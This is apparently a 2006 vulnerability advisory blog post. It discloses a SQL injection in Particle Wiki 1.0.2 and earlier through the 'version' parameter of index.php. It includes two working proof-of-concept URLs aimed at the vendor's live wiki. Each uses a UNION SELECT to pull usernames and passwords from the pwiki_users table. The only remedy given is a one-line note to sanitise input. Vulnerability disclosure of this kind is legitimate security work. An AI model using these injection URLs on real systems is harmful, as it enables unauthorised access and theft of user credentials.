by r0t,der4444,cembo,VietMafia

Monday, June 05, 2006

Particle Wiki SQL inj.

###############################################
Vuln. discovered by : r0t
Date: 5 june 2006
vendor:www.particlesoft.net/particlewiki/
affected versions:1.0.2 and prior
###############################################

Vuln. Description:

Particle Wiki contains a flaw that allows a remote sql injection attacks.Input passed to the "version" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

POC:

# Exploited by FarhadKey from http://www.kapda.ir

Username :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select
%201,1,1,1,1,username%20from%20pwiki_users%20/*
Password :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select
%201,1,1,1,1,password%20from%20pwiki_users%20/*

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew